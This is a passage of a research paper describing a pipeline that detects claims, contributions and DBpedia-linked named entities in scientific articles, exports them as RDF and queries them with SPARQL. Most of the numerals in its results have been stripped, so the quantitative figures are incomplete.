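as a rough illustration of how rules of this kind can be operationalized, the following sketch classifies a pre-tagged sentence as a contribution when a deictic phrase is followed by a presentation verb from the trigger gazetteer. it is a deliberately simplified stand-in for the actual rule set (our pipeline implements the rules on top of the gate framework) and reuses the same kind of toy gazetteers as the previous sketch.

```python
# much-simplified, illustrative stand-in for the rule-based RE classification:
# a sentence is tagged as a contribution if a deictic phrase ("this paper",
# "here, we", ...) is followed by a presentation verb from the trigger gazetteer.
from typing import List, Tuple

PRESENTATION_VERBS = {"present", "propose", "describe", "demonstrate", "introduce"}
DEICTIC_NOUNS = {"paper", "work", "article"}

Token = Tuple[str, str, str]  # (surface form, lemma, coarse POS tag)

def classify(tokens: List[Token]) -> str:
    deictic_seen = False
    for surface, lemma, pos in tokens:
        # deictic rule (simplified): a noun like "paper" or the adverb "here"
        # anchoring the discourse to the article itself
        if lemma in DEICTIC_NOUNS or (pos == "ADV" and lemma == "here"):
            deictic_seen = True
        # metadiscourse/contribution rule (simplified): a presentation verb
        # following a deictic phrase marks the sentence as a contribution
        elif deictic_seen and pos == "VERB" and lemma in PRESENTATION_VERBS:
            return "Contribution"
    return "Neither"

sentence = [("This", "this", "DET"), ("paper", "paper", "NOUN"),
            ("presents", "present", "VERB"), ("a", "a", "DET"),
            ("new", "new", "ADJ"), ("framework", "framework", "NOUN")]
print(classify(sentence))  # -> Contribution
```

the real rules additionally distinguish claims from contributions by checking for comparative or assertive constructions, as described above; this sketch only covers the contribution case.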
automatic detection of named entities
using the rules described above, we can now find and classify res in a scientific document. however, using res alone, a system is still not able to understand the topics being discussed in a document, for example, to generate a topic-focused summary. therefore, the next step towards constructing a knowledge base of scientific literature is detecting the named entities that appear in a document. our hypothesis here is that the extraction of named entities provides the means to represent the main topics being discussed in a paper. the detection of such entities, along with the linguistic constituents of the re fragments, thus helps towards understanding the meaning of an article's content and the position of its authors regarding the detected entities, e.g., 'enhancing algorithm a' or 'applying method m.' since the recognition of nes varies across domains (e.g., biological terms vs. software methodologies), instead of developing multiple domain-specific ner tools, we reuse the lod cloud as a continually updated source of structured knowledge, by linking the surface forms of terms in a document to their corresponding resources in the lod cloud. to test this hypothesis, we selected the dbpedia spotlight annotation tool described in section 'named entity linking' to automate the entity recognition task. our goal here is to annotate the full text of a document and then map the detected entities to the original document using the text offsets provided by spotlight. since we are solely interested in named entities, we discard any tagged entity that does not fall within a noun phrase chunk. this way, adverbs or adjectives like "here" or "successful" are filtered out, and phrases like "service-oriented architecture" can be extracted as a single entity.

semantic representation of entities
in order to transform the detected rhetorical and named entities into an interoperable and machine-understandable data structure that can be added to a semantic knowledge base, we chose to represent the extracted entities described above, as well as other metadata about each document, using the w3c standard rdf format. each document thus becomes the subject of a triple, and all the detected entities are attached to the document instance using custom predicates. each entity may itself be the subject of other triples describing its semantic types and other properties, hence creating a flexible, scalable graph of the knowledge mined from the document.

table : vocabularies used in our semantic model. the table shows the list of shared linked open vocabularies that we use to model the detected entities from scientific literature, as well as their inter-relationships.
prefix    vocabulary                      uri
pubo      publication ontology            <http://lod.semanticsoftware.info/pubo/pubo#>
doco      document components ontology    <http://purl.org/spar/doco>
sro       salt rhetorical ontology        <http://salt.semanticauthoring.org/ontologies/sro#>
rdf       w3c rdf                         <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
rdfs      w3c rdf schema                  <http://www.w3.org/2000/01/rdf-schema#>
cnt       w3c content ontology            <http://www.w3.org/2011/content#>
dbpedia   dbpedia ontology                <http://dbpedia.org/resource/>

vocabularies
as discussed in section 'document markup vocabularies', we try to reuse existing linked open vocabularies for modeling the documents and the extracted knowledge, following the best practices for producing linked open datasets (best practices for publishing linked data, http://www.w3.org/tr/ld-bp/). therefore, we developed a vocabulary for scientific literature constructs partly by using existing shared vocabularies (table ). we chose to reuse the doco vocabulary for the semantic description of a document's structure, since it covers both structural and rhetorical entities of a document by integrating the deo (discourse elements ontology, http://purl.org/spar/deo) and salt rhetorical ontologies. by using doco, we can thus describe both the structure of documents (e.g., abstract, title) as well as various re types (e.g., contributions).
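a minimal rdflib sketch (python; not our actual exporter, which is described later) of binding the vocabularies from the table above and attaching one detected entity to a document instance via a custom predicate; the document uri and the class/property names used here are illustrative assumptions:

# sketch: bind the shared vocabularies and attach a detected entity to a document
from rdflib import Graph, Namespace, URIRef
from rdflib.namespace import RDF

pubo = Namespace("http://lod.semanticsoftware.info/pubo/pubo#")
doco = Namespace("http://purl.org/spar/doco/")
sro = Namespace("http://salt.semanticauthoring.org/ontologies/sro#")

g = Graph()
g.bind("pubo", pubo)
g.bind("doco", doco)
g.bind("sro", sro)

doc = URIRef("http://example.org/corpus/paper-42")          # hypothetical document uri
entity = URIRef("http://example.org/corpus/paper-42#re-1")  # hypothetical entity uri
g.add((doc, RDF.type, pubo.Document))          # class name assumed for illustration
g.add((entity, RDF.type, sro.Contribution))    # claim/contribution classes come from sro
g.add((doc, pubo.hasAnnotation, entity))       # custom predicate, assumed for illustration
print(g.serialize(format="turtle"))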
we also developed our own vocabulary to describe the relations between a document and its contained entities. our publication ontology (pubo, http://lod.semanticsoftware.info/pubo/pubo.rdf), which uses "pubo" as its namespace prefix throughout this paper, models res as a subset of a document's sentences with a specific type, which may in turn contain a list of topics, i.e., named entities with uris linked to their lod resources. figure shows example rdf triples using our publication model and other shared semantic web vocabularies. the most similar vocabulary to our pubo vocabulary would have been the open annotation (oa) data model (http://www.w3.org/ns/oa), where each detected entity is described with a body and a target element: the former creates a uri representing the annotation (and some provenance information), and the latter provides information like the source document url and text offsets. the generated body and target instances are then connected using custom oa predicates. using the oa data model, however, would lead to a 'triple bloat' situation, where multiple triples are required to convey one fact, increasing the size of the knowledge base by a factor of – . moreover, the oa data model lacks an explicit representation of embedded annotations, such as the description of named entities contained within a rhetorical entity, which would require more complex and time-consuming queries to extract these facts from the knowledge base.
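to make the pubo modelling concrete, the following rdflib sketch builds the nested structure described above for one invented document: a contribution sentence attached to the document, with a dbpedia-grounded named entity nested inside it. pubo:containsNE is the predicate used for this nesting in the knowledge base population section below; the remaining property names (pubo:hasAnnotation, owl:sameAs) and all uris are illustrative assumptions:

# sketch: a document that has a contribution sentence as annotation,
# which in turn contains a dbpedia-grounded named entity.
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import OWL, RDF

pubo = Namespace("http://lod.semanticsoftware.info/pubo/pubo#")
sro = Namespace("http://salt.semanticauthoring.org/ontologies/sro#")
cnt = Namespace("http://www.w3.org/2011/content#")

g = Graph()
for prefix, ns in [("pubo", pubo), ("sro", sro), ("cnt", cnt)]:
    g.bind(prefix, ns)

doc = URIRef("http://example.org/paper-42")                   # invented uris
re_ = URIRef("http://example.org/paper-42#contribution-1")
ne = URIRef("http://example.org/paper-42#ne-1")

g.add((re_, RDF.type, sro.Contribution))
g.add((re_, cnt.chars, Literal("this paper presents a use case of adding value to a bird observation dataset ...")))
g.add((doc, pubo.hasAnnotation, re_))          # predicate name assumed for illustration
g.add((ne, RDF.type, pubo.LinkedNamedEntity))
g.add((ne, OWL.sameAs, URIRef("http://dbpedia.org/resource/Data_set")))  # grounding property assumed
g.add((re_, pubo.containsNE, ne))              # the nesting described in the text
print(g.serialize(format="turtle"))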
the entity export process
while the type of the extracted entities is decided by the rules described in 'automatic detection of rhetorical entities', we would ideally still like the flexibility to express the mapping of annotations to rdf triples and their inter-relations at runtime. this way, various representations of the knowledge extracted from documents can be constructed based on the intended use case and customized without affecting the underlying syntactic and semantic processing components. we therefore designed an lod exporter component that transforms the annotations in a document into rdf triples. the transformation is conducted according to a series of mapping rules, which describe (i) the annotation types in the document and their corresponding semantic types, (ii) the annotations' features and their corresponding semantic types, and (iii) the relations between exported triples and the type of their relation. given the mapping rules, the exporter component iterates over a document's entities and exports each designated annotation as the subject of a triple, with a custom predicate and its attributes, such as its features, as the object. table summarizes the shared vocabularies that we use in the annotation export process.

implementation
we implemented the nlp pipeline described in the 'design' section based on the general architecture for text engineering (gate, http://gate.ac.uk) (cunningham et al., ), a robust, open-source framework for developing language engineering applications. our pipeline is composed of several processing resources (prs) that run sequentially on a given document, as shown in fig. .

figure : the sequence of processing resources of our text mining pipeline that runs on a document's text, producing various annotations, which are finally exported into a knowledge base.

each processing resource can generate a new annotation or add a new feature to the annotations produced by upstream processing resources. in this section, we provide the implementation details of each of our pipeline's components. note that the materials described in this section can be found at http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements.
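conceptually, this sequential pr architecture can be sketched as follows (plain python, not gate; the annotation structure and the two toy processing resources are invented for the example):

# conceptual sketch: a document flows through processing resources in order;
# each pr may add new annotations or enrich the annotations of upstream prs.
def tokenise(doc):
    # adds one "Token" annotation per whitespace-separated word
    pos = 0
    for word in doc["text"].split():
        start = doc["text"].index(word, pos)
        doc["annotations"].append({"type": "Token", "start": start, "end": start + len(word), "features": {}})
        pos = start + len(word)

def lowercase_root(doc):
    # enriches upstream "Token" annotations with a (naive) root-form feature
    for ann in doc["annotations"]:
        if ann["type"] == "Token":
            ann["features"]["root"] = doc["text"][ann["start"]:ann["end"]].lower()

def run_pipeline(text, processing_resources):
    doc = {"text": text, "annotations": []}
    for pr in processing_resources:
        pr(doc)
    return doc

doc = run_pipeline("this paper presents a use case", [tokenise, lowercase_root])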
pre-processing the input documents
we use gate's annie plugin (cunningham et al., ), which offers readily available pre-processing resources to break down a document's text into smaller units adequate for the pattern-matching rules. specifically, we use the following processing resources provided by gate's annie and tools plugins:
- document reset pr: removes any existing annotations (e.g., from previous runs of the pipeline) from a document;
- annie english tokeniser: breaks the stream of a document's text into tokens, classified as words, numbers or symbols;
- regex sentence splitter: uses regular expressions to detect the boundaries of sentences in a document;
- annie pos tagger: adds a part-of-speech tag to each token as a new feature; and
- gate morphological analyser: adds the root form of each token as a new feature.
the pre-processed text is then passed on to the downstream processing resources.

rhetector: automatic detection of rhetorical entities
we developed rhetector (http://www.semanticsoftware.info/rhetector) as a stand-alone gate plugin to extract rhetorical entities from scientific literature. rhetector has several processing resources: (i) the rhetorical entity gazetteer pr, which produces lookup annotations by comparing the text tokens against its dictionary lists (domain concepts, rhetorical verbs, etc.) with the help of the flexible gazetteer, which matches on the root form of each token; and (ii) the rhetorical entity transducer, which applies the rules described in section 'automatic detection of rhetorical entities' to sequences of tokens and their lookup annotations to detect rhetorical entities. the rules are implemented in gate's jape language (cunningham et al., ), which provides regular expressions over document annotations by internally compiling the rules into finite-state transducers. every jape rule has a left-hand side that defines a pattern, which is matched against the text, and a right-hand side that produces the declared annotation type. additional information is stored as features of the annotations. a sequence of jape rules for extracting a contribution sentence containing a metadiscourse phrase is shown in fig. .

lodtagger: named entity detection and grounding using dbpedia spotlight
we locally installed the dbpedia spotlight tool (http://spotlight.dbpedia.org) (daiber et al., ), version . , together with a statistical model for english (en + , http://spotlight.sztaki.hu/downloads/), and used its restful annotation service to find and disambiguate named entities in our documents. to integrate the ne detection process into our semantic analysis workflow, we implemented lodtagger (http://www.semanticsoftware.info/lodtagger), a gate plugin that acts as a wrapper for the spotlight tool. the dbpediatagger pr sends the full text of the document to spotlight as an http post request and receives an array of json objects as the result, like the example shown in fig. .
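outside of gate, the same rest call can be sketched in a few lines of python; the local service url and the confidence value are assumptions, while the request parameters and json keys ("Resources", "@URI", "@offset", "@surfaceForm") are those exposed by the spotlight annotation service:

# sketch: send a document's text to a (locally installed) dbpedia spotlight
# service and collect (surface form, offset, uri) tuples from the json response.
import requests

SPOTLIGHT_URL = "http://localhost:2222/rest/annotate"   # assumed local endpoint

def annotate(text, confidence=0.5):
    resp = requests.post(
        SPOTLIGHT_URL,
        data={"text": text, "confidence": confidence},
        headers={"Accept": "application/json"},
        timeout=60,
    )
    resp.raise_for_status()
    resources = resp.json().get("Resources", [])
    return [(r["@surfaceForm"], int(r["@offset"]), r["@URI"]) for r in resources]

print(annotate("we use linked open data to model scientific literature."))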
figure : jape rules (left) that are applied to a document's text to extract a contribution sentence; the right side shows the generated annotations (deictic, metadiscourse and rhetoricalentity), color-coded in gate's graphical user interface.

figure : a json example response from spotlight (left) and how the detected entity's offset is used to generate a gate annotation in the document (right).

the dbpediatagger pr then parses each json object and adds a dbpedialink annotation, with a dbpedia uri as its feature, to the document. to further filter the resulting entities, we align them with noun phrases (nps), as detected by the munpex np chunker for english (multi-lingual noun phrase extractor, http://www.semanticsoftware.info/munpex). the alignment is performed using a jape rule (dbpedia ne filter in fig. ), which removes dbpedialink annotations that are not nouns or noun phrases. similarly, we discard nes that consist of a pronoun only.
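the np-based filtering can be sketched as follows in python, using spacy's noun chunks as a stand-in for the munpex chunker; the model name and the entity tuple format (matching the rest sketch above) are assumptions:

# sketch: keep only entities whose span falls inside a noun phrase chunk,
# and drop entities that consist of a pronoun only.
import spacy

nlp = spacy.load("en_core_web_sm")   # assumed english model, installed separately

def filter_entities(text, entities):
    """entities: list of (surface_form, start_offset, uri) as returned by the spotlight wrapper."""
    doc = nlp(text)
    chunks = [(c.start_char, c.end_char) for c in doc.noun_chunks]
    kept = []
    for surface, start, uri in entities:
        end = start + len(surface)
        inside_np = any(cs <= start and end <= ce for cs, ce in chunks)
        span = doc.char_span(start, end)
        pronoun_only = span is not None and all(t.pos_ == "PRON" for t in span)
        if inside_np and not pronoun_only:
            kept.append((surface, start, uri))
    return kept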
lodexporter: knowledge base population
we now have res and nes detected in the source documents, but they come in a gate-specific data structure, i.e., gate annotations. in order to export them into an interoperable, queryable format, we developed lodexporter (http://www.semanticsoftware.info/lodexporter), a gate plugin that uses the apache jena framework (http://jena.apache.org) to export annotations to rdf triples, according to a set of custom mapping rules that refer to the vocabularies described in 'semantic representation of entities' (cf. table ). the mapping rules themselves are also expressed in rdf and explicitly define which annotation types have to be exported and what vocabularies and relations must be used to create a new triple in the knowledge base. using this file, each annotation becomes the subject of a new triple, with a custom predicate and its attributes, such as its features, as the object.

figure : example rules, expressed in rdf, declaring how gate annotations should be mapped to rdf for knowledge base population, including the definition of lod vocabularies to be used for the created triples.

the example annotation mapping rules shown in fig. describe export specifications that map rhetoricalentity and dbpediane annotations in gate documents to instances of the rhetoricalelement and linkednamedentity classes in the sro and pubo ontologies, respectively.
the verbatim content of each annotation and the uri feature of each dbpediane are also exported using the defined predicates. finally, using the relation mapping rule, each dbpediane annotation that is contained within the span of a detected rhetoricalentity is connected to the re instance in the knowledge base using the pubo:containsne predicate. ultimately, the generated rdf triples are stored in a scalable, tdb-based triplestore (apache tdb, http://jena.apache.org/documentation/tdb/). an example rdf graph output for the mapping rules from fig. is illustrated in fig. .

figure : example rdf triples generated using our publication modeling schema. the rdf graph here represents the rhetorical and named entities annotated in a document, shown in figs. and , created through the mapping rules shown in fig. .
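the following python/rdflib sketch illustrates the overall export logic: declarative mapping rules drive the typing of annotations and the export of their features, and the relation mapping nests contained named entities inside rhetorical entities via pubo:containsNE. the rule encoding, the annotation dictionaries and the rdfs:isDefinedBy choice for the ne uri are simplified assumptions; the actual lodexporter is a gate plugin built on apache jena, with the rules themselves expressed in rdf:

# sketch: rule-driven export of annotations to rdf, including the relation
# mapping that links contained named entities to rhetorical entities.
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import RDF, RDFS

pubo = Namespace("http://lod.semanticsoftware.info/pubo/pubo#")
sro = Namespace("http://salt.semanticauthoring.org/ontologies/sro#")
cnt = Namespace("http://www.w3.org/2011/content#")

# (i) annotation type -> semantic class, (ii) feature -> predicate
# (rdfs:isDefinedBy is an illustrative choice for linking an ne to its dbpedia uri)
mapping_rules = {
    "RhetoricalEntity": {"class": sro.RhetoricalElement, "features": {"content": cnt.chars}},
    "DBpediaNE": {"class": pubo.LinkedNamedEntity, "features": {"content": cnt.chars, "URI": RDFS.isDefinedBy}},
}

def export(doc_uri, annotations):
    """annotations: dicts with 'id', 'type', 'start', 'end' and feature values such as 'content' or 'URI'."""
    g = Graph()
    uri = lambda ann: URIRef(f"{doc_uri}#{ann['id']}")
    for ann in annotations:
        rule = mapping_rules.get(ann["type"])
        if rule is None:
            continue                                  # only annotation types named in the rules are exported
        g.add((uri(ann), RDF.type, rule["class"]))
        for feature, predicate in rule["features"].items():
            if feature in ann:
                obj = URIRef(ann[feature]) if feature == "URI" else Literal(ann[feature])
                g.add((uri(ann), predicate, obj))
    # (iii) relation mapping: nes contained in an re's span -> pubo:containsNE
    res = [a for a in annotations if a["type"] == "RhetoricalEntity"]
    nes = [a for a in annotations if a["type"] == "DBpediaNE"]
    for re_ann in res:
        for ne_ann in nes:
            if re_ann["start"] <= ne_ann["start"] and ne_ann["end"] <= re_ann["end"]:
                g.add((uri(re_ann), pubo.containsNE, uri(ne_ann)))
    return g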
evaluation
we use three open-access corpora in our experiments:
1. the sepublica corpus contains documents from the proceedings of the semantic publishing workshops (http://sepublica.mywikipaper.org/drupal/) from to .
2. peerjcompsci is a collection of open-access papers from the computer science edition of the peerj journal (https://peerj.com/computer-science/).
3. az is a collection of conference articles in computational linguistics, originally curated by teufel ( ) (argumentation zoning (az) corpus, http://www.cl.cam.ac.uk/~sht25/az_corpus.html).
the documents in these corpora are in pdf or xml formats, and range from to pages in various layouts (acm, lncs, and peerj). we scraped the text from all files, analyzed them with our text mining pipeline described in the 'implementation' section, and stored the extracted knowledge in a tdb-based triplestore. the generated knowledge base is also available for download on our supplements page (http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements).

quantitative analysis of the populated knowledge base
table shows the quantitative results of the populated knowledge base; the table is automatically generated through a number of sparql queries on the knowledge base, and the source code to reproduce it can be found on our supplementary materials page. the total number of rdf triples generated is , , . on average, the processing time for extracting res and nes, as well as the triplification of their relations, was . , . and . seconds per document for the peerjcompsci, sepublica and az corpora, respectively, with the dbpedia spotlight annotation process taking up around % of the processing time (running on a standard quad-core desktop pc).
table: quantitative analysis of the populated knowledge base. we processed three corpora for res and nes. the columns 'distinct uris' and 'distinct dbpedia ne/re' count each uri only once throughout the kb, hence the total is not the sum of the individual corpora, as some uris appear across them. for each corpus (az, peerjcompsci, sepublica) and for the total, the table reports the corpus size (documents and sentences), the dbpedia named entities (occurrences and distinct uris), the rhetorical entities (claims and contributions), and the distinct dbpedia ne/re counts.

the spotlight annotation process took up around % of the processing time (running on a standard quad-core desktop pc). for each corpus, we ran a number of queries on the knowledge base to count the occurrences of nes and res in the contained documents. the 'dbpedia named entities (occurrences)' column shows the total number of nes tagged by spotlight, whereas the 'dbpedia named entities (distinct uris)' column shows the total of named entities with a unique uri. for example, if we have both "linked open data" and "lod" tagged in a document, the total occurrence would be two, but since they are both grounded to the same uri (i.e., dbpedia:Linked_data), the total distinct number of nes is one. this is particularly interesting in relation to their distribution within the documents' rhetorical zones (column 'distinct dbpedia ne/re'). as can be seen in the table, the number of nes within res is an order of magnitude smaller than the total number of distinct named entities throughout the whole papers. this holds across the three distinct corpora we evaluated. this experiment shows that nes are not evenly distributed in scientific literature. overall, this is encouraging for our hypothesis that the combination of nes with res brings added value, compared to either technique alone: as mentioned in the example above, a paper could mention a topic, such as "linked data," but only as part of its motivation, literature review, or future work.
in this case, while the topic appears in the document, the paper does not actually contain a contribution involving linked data. relying on standard information retrieval techniques hence results in a large amount of noise when searching for literature with a particular contribution. semantic queries, on the other hand, as we propose them here, can easily identify relevant papers in a knowledge base, as we will show in the 'application' section below.

text mining pipeline evaluation
we assessed the performance of our text mining pipeline by conducting an intrinsic evaluation, i.e., comparing its precision and recall with respect to a gold standard corpus.

gold standard corpus development and evaluation metrics
in an intrinsic evaluation scenario, the output of an nlp pipeline is directly compared with a gold standard (also known as the ground truth) to assess its performance in a task. towards this end, we manually curated a gold standard corpus of documents, where papers were randomly selected from each of the three datasets described in the 'evaluation' section.

table: statistics of our gold standard corpus. we manually annotated documents from different sources with claim and contribution entities. for each corpus (az, peerjcompsci, sepublica) and for the total, the table lists the number of documents, sentences, and tokens, together with the number of claims and contributions manually annotated by the authors.

these documents were then annotated by the first author in the gate developer graphical user interface (cunningham et al., ). each sentence containing a rhetorical entity was manually annotated and classified as either a claim or contribution by adding the respective class uri from the sro ontology as the annotation feature. the annotated sepublica papers were used during system development, whereas the annotated az and peerjcompsci documents were strictly used for testing only. the table above summarizes the statistics of our gold standard corpus. note that both the az and peerjcompsci gold standard documents are available with our supplements in full-text stand-off xml format, whereas for the sepublica corpus we can currently only include our annotations, as their license does not permit redistribution.

for the evaluation, we ran our rhetector pipeline on the evaluation corpus and computed the metrics precision (p), recall (r), and their f-measure, using gate's corpus qa tool (cunningham et al., ). for each metric, we calculated the micro and macro average: in micro averaging, the evaluation corpus (composed of our three datasets) is treated as one large document, whereas in macro averaging, p, r, and f are calculated on a per-document basis, and then an average is computed (cunningham et al., ).
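as a concrete illustration of the two averaging modes described above, the following sketch computes micro- and macro-averaged precision, recall, and f-measure from per-document counts. it is a minimal example with hypothetical counts, not the gate corpus qa implementation.

# micro/macro averaged precision, recall, and f-measure from per-document counts
# the counts below are hypothetical; they only illustrate the two averaging modes
def prf(tp, fp, fn):
    p = tp / (tp + fp) if tp + fp else 0.0
    r = tp / (tp + fn) if tp + fn else 0.0
    f = 2 * p * r / (p + r) if p + r else 0.0
    return p, r, f

documents = [  # (true positives, false positives, false negatives) per document
    (12, 3, 4),
    (7, 1, 2),
    (20, 5, 6),
]

# micro average: pool all counts as if the corpus were one large document
tp, fp, fn = (sum(c) for c in zip(*documents))
micro_p, micro_r, micro_f = prf(tp, fp, fn)

# macro average: compute p, r, f per document, then average the per-document scores
per_doc = [prf(*d) for d in documents]
macro_p, macro_r, macro_f = (sum(s) / len(per_doc) for s in zip(*per_doc))

print(f"micro: p={micro_p:.2f} r={micro_r:.2f} f={micro_f:.2f}")
print(f"macro: p={macro_p:.2f} r={macro_r:.2f} f={macro_f:.2f}")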
intrinsic evaluation results and discussion
the table below shows the results of our evaluation. on average, the rhetector pipeline obtained an f-measure of . on the evaluation dataset. we also gained some additional insights into the performance of rhetector. when comparing the az and sepublica corpora, we can see that the pipeline achieved almost the same f-measure for roughly the same amount of text, although the two datasets are from different disciplines: sepublica documents are semantic web-related workshop papers, whereas the az corpus contains conference articles in computational linguistics. another interesting observation is the robustness of rhetector's performance when the size of an input document (i.e., its number of tokens) increases. for example, when comparing the az and peerjcompsci performance, we observed only a . difference in the pipeline's (micro) f-measure, even though the total number of tokens to process was doubled ( , vs. , tokens, respectively).

table: results of the intrinsic evaluation of rhetector. we assessed the precision, recall, and f-measure of our pipeline against the gold standard corpora. for each corpus (az, peerjcompsci, sepublica) and for the total, the table reports the number of claims and contributions detected by rhetector, together with the micro and macro averages of precision, recall, and f-measure.

an error analysis of the intrinsic evaluation results showed that the recall of our pipeline suffers when: (i) the authors' contribution is described in passive voice and the pipeline could not attribute it to the authors; (ii) the authors used unconventional metadiscourse elements; (iii) the rhetorical entity was contained in an embedded sentence; and (iv) the sentence splitter could not find the correct sentence boundary, so the re span covered more than one sentence.

accuracy of ne grounding with spotlight
to evaluate the accuracy of ne linking to the lod, we randomly chose – entities per document from the sepublica corpus and manually evaluated whether they are connected to their correct sense in the dbpedia knowledge base, by inspecting their uris through a web browser. out of the entities manually inspected, of the entities had their correct semantics in the dbpedia knowledge base. overall, this results in % accuracy, which confirms our hypothesis that lod knowledge bases are useful for the semantic description of entities in scientific documents. our error analysis of the detected named entities showed that spotlight was often unable to resolve entities to their correct resource (sense) in the dbpedia knowledge base. spotlight was also frequently unable to resolve acronyms to their full names. for example, spotlight detected the correct sense for the term "information extraction," while the term "(ie)" appearing right next to it was resolved to "internet explorer" instead. by design, this is exactly how the spotlight disambiguation mechanism works: popular terms have higher chances to be connected to their surface forms. we inspected the corresponding articles on wikipedia and discovered that the wikipedia article on internet explorer is significantly longer than the information extraction page and has many times more inline links, which shows its prominence in the dbpedia knowledge base at the time of writing. consequently, this shows that tools like spotlight that have been trained on the general domain or on news articles are biased towards topics that are more popular, which is not necessarily the best strategy for scientific publications.
application
we published the populated knowledge base described in the previous section using the jena fuseki server (http://jena.apache.org/documentation/serving_data/), which provides a restful endpoint for sparql queries.
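because the knowledge base is exposed through a standard sparql endpoint, the queries shown in the scenarios below can also be issued programmatically by any sparql client. the following minimal sketch sends the contribution query from the first scenario to such an endpoint using the python SPARQLWrapper library; the endpoint url and the sro/pubo prefix iris are placeholders that would need to match the actual installation and the vocabulary prefixes defined earlier in the paper.

# minimal sparql client sketch; the endpoint url and the sro/pubo prefix iris are placeholders
from SPARQLWrapper import SPARQLWrapper, JSON

ENDPOINT = "http://localhost:3030/papers/query"  # hypothetical local fuseki dataset

QUERY = """
prefix rdf:  <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
prefix cnt:  <http://www.w3.org/2011/content#>
prefix sro:  <http://example.org/sro#>   # placeholder for the sro ontology iri
prefix pubo: <http://example.org/pubo#>  # placeholder for the pubo ontology iri

select ?paper ?content
where {
  ?paper pubo:hasAnnotation ?re .
  ?re rdf:type sro:Contribution .
  ?re cnt:chars ?content .
}
order by ?paper
"""

sparql = SPARQLWrapper(ENDPOINT)
sparql.setQuery(QUERY)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()

# print each paper uri together with its contribution sentence
for row in results["results"]["bindings"]:
    print(row["paper"]["value"], "->", row["content"]["value"])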
we now show how the extracted knowledge can be exploited to support a user in her tasks. as a running example, let us imagine a use case: a user wants to write a literature review from a given set of documents about a specific topic.

scenario 1. a user obtained the sepublica proceedings from the web. before reading each article thoroughly, she would like to obtain a summary of the contributions of all articles, so she can decide which articles are relevant to her task.

ordinarily, our user would have to read all of the retrieved documents in order to evaluate their relevance, a cumbersome and time-consuming task. however, using our approach the user can directly query for the rhetorical type that she needs from the system (note: the prefixes used in the queries in this section can be resolved using the prefix table given earlier):

select ?paper ?content
where {
  ?paper pubo:hasAnnotation ?rhetoricalEntity .
  ?rhetoricalEntity rdf:type sro:Contribution .
  ?rhetoricalEntity cnt:chars ?content
}
order by ?paper

the system will then show the query's results in a suitable format, like the examples in the following table, which dramatically reduces the amount of information that the user is exposed to, compared to a manual triage approach.

table: three example contributions from papers obtained through a sparql query. the rows show the paper id and the contribution sentence extracted from the user's corpus.
sepublica /paper- .xml: "this position paper discusses how research publication would benefit of an infrastructure for evaluation entities that could be used to support documenting research efforts (e.g., in papers or blogs), analysing these efforts, and building upon them."
sepublica /paper- .xml: "in this paper, we describe our attempts to take a commodity publication environment, and modify it to bring in some of the formality required from academic publishing."
sepublica /paper- .xml: "we address the problem of identifying relations between semantic annotations and their relevance for the connectivity between related manuscripts."

retrieving document sentences by their rhetorical type still returns res that may concern entities that are irrelevant or less interesting for our user in her literature review task. ideally, the system should return only those res that mention user-specified topics. since we model both the res and the nes that appear within their boundaries, the system can allow the user to further stipulate her request. consider the following scenario:

scenario 2. from the set of downloaded articles, the user would like to find only those articles that have a contribution mentioning 'linked data'.

similar to scenario 1, the system will answer the user's request by executing the following query against its knowledge base:
select distinct ?paper ?content
where {
  ?paper pubo:hasAnnotation ?rhetoricalEntity .
  ?rhetoricalEntity rdf:type sro:Contribution .
  ?rhetoricalEntity pubo:containsNE ?ne .
  ?ne rdfs:isDefinedBy dbpedia:Linked_data .
  ?rhetoricalEntity cnt:chars ?content
}
order by ?paper

the results returned by the system, partially shown in the table below, are especially interesting. the query not only retrieved parts of articles that the user would be interested in reading, but it also inferred that the "linked open data," "linked data," and "lod" named entities have the same semantics, since the dbpedia knowledge base declares an owl:sameAs relationship between the aforementioned entities: a full-text search on the papers, on the other hand, would not have found such a semantic relation between the entities.

table: two example contributions about 'linked data'. the results shown are contribution sentences that contain an entity described by dbpedia:Linked_data.
sepublica /paper- .xml: "we present two real-life use cases in the fields of chemistry and biology and outline a general methodology for transforming research data into linked data."
sepublica /paper- .xml: "in this paper we present a vision for having such data available as linked open data (lod), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers."

so far, we showed how we can make use of the lod-linked entities to retrieve articles of interest for a user. note that this query returns only those articles with res that contain an ne whose uri exactly matches that of dbpedia:Linked_data. however, by virtue of traversing the lod cloud using an ne's uri, we can expand the query to ask for contributions that involve dbpedia:Linked_data or any of its related subjects. in our experiment, we interpret relatedness as being under the same category in the dbpedia knowledge base (see the figure described below). consider the scenario below:

scenario 3. the user would like to find only those articles that have a contribution mentioning topics related to 'linked data'.

the system can respond to the user's request in three steps: (i) first, through a federated query to the dbpedia knowledge base, we find the category that dbpedia:Linked_data has been assigned to; in this case, the dbpedia knowledge base returns "semantic web," "data management," and "world wide web" as the categories; (ii) then, we retrieve all other subjects which are under the same identified categories; (iii) finally, for each related entity, we look for rhetorical entities in the knowledge base that mention the related named entities within their boundaries.

figure: finding semantically related entities in the dbpedia ontology. the linked data and controlled vocabulary entities in the dbpedia knowledge base are assumed to be semantically related to each other, since they are both contained under the same category, i.e., semantic web.

the semantically expanded query is shown below:

select ?paper ?content
where {
  service <http://dbpedia.org/sparql> {
    dbpedia:Linked_data <http://purl.org/dc/terms/subject> ?category .
    ?subject <http://purl.org/dc/terms/subject> ?category .
  }
  ?paper pubo:hasAnnotation ?rhetoricalEntity .
  ?rhetoricalEntity rdf:type sro:Contribution .
  ?rhetoricalEntity pubo:containsNE ?ne .
  ?ne rdfs:isDefinedBy ?subject .
  ?rhetoricalEntity cnt:chars ?content
}
order by ?paper

the system will return the results, shown in the following table, to the user. this way, the user receives more results from the knowledge base that cover a wider range of topics semantically related to linked data, without having to explicitly define their semantic relatedness to the system.

table: results from the extended query, showing contribution sentences that mention a named entity semantically related to dbpedia:Linked_data.
sepublica /paper- .xml: "in this paper, we propose a model to specify workflow-centric research objects, and show how the model can be grounded using semantic technologies and existing vocabularies, in particular the object reuse and exchange (ore) model and the annotation ontology (ao)."
sepublica /paper- .xml: "in this paper we present a vision for having such data available as linked open data (lod), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers."
